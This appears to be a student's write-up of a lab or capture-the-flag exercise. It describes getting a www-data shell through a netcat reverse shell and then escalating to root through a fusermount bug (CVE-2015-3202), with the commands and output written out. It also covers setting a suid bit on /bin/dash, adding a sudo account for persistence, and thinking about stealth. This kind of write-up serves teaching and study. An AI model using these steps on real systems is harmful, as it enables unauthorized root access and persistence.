a
    There is not much to explain here.. we open a listening netcat in the first terminal and the command second terminal opens a connection to it from the server we should attack, and executes /bin/bash.

    We then have a shell for www-data in the first terminal.

c
    I used https://www.exploit-db.com/exploits/37089/ which exploits CVE-2015-3202. It exploits a bug in fusermount which allows us to overwrite some file with root rights. We then overwrite /etc/bash.bashrc or /etc/default/locale or so to point to a script in /tmp, in which we do something that we want to be done with root rights. I used chmod 4755 /bin/dash, as suggested there. Then next time root logs in (in the case of /etc/bash.bashrc) or some cron job running with root rights sources /etc/default/locale, the exploit is executed. You can them come back and find /bin/dash with u+s rights, so you can get root rights in that shell.

    I then created my own account (camil) with sudo rights so that I could clean up without losing root rights in case I would need it later. In particular, I removed the suid bit from /bin/dash so that others wouldn't find it and use it (e.g. find / -perm -u=s -type f 2>/dev/null)

    Concretely, the commands used were:

    $ printf "chmod 4755 /bin/dash" > /tmp/exploit
    $ chmod 755 /tmp/exploit
    $ mkdir -p '/tmp/exploit||/tmp/exploit'
    $ LIBMOUNT_MTAB=/etc/default/locale _FUSE_COMMFD=0 fusermount '/tmp/exploit||/tmp/exploit'
    fusermount: failed to open /etc/fuse.conf: Permission denied
    sending file descriptor: Socket operation on non-socket
    $ cat /etc/default/locale
    /dev/fuse /tmp/exploit||/tmp/exploit fuse rw,nosuid,nodev,user=www-data 0 0

    When locale is sourced, /dev/fuse /tmp/exploit will be piped to /tmp/exploit, so the latter is executed.

    I had /etc/bash.bashrc changed as well since sometime on Saturday, but unfortunately root didn't login. I also found that using /etc/bash.bashrc isn't very stealthy, because if you're using bash as unprivileged user, you see:

    bash: /dev/fuse: Permission denied
    chmod: changing permissions of `/bin/dash': Operation not permitted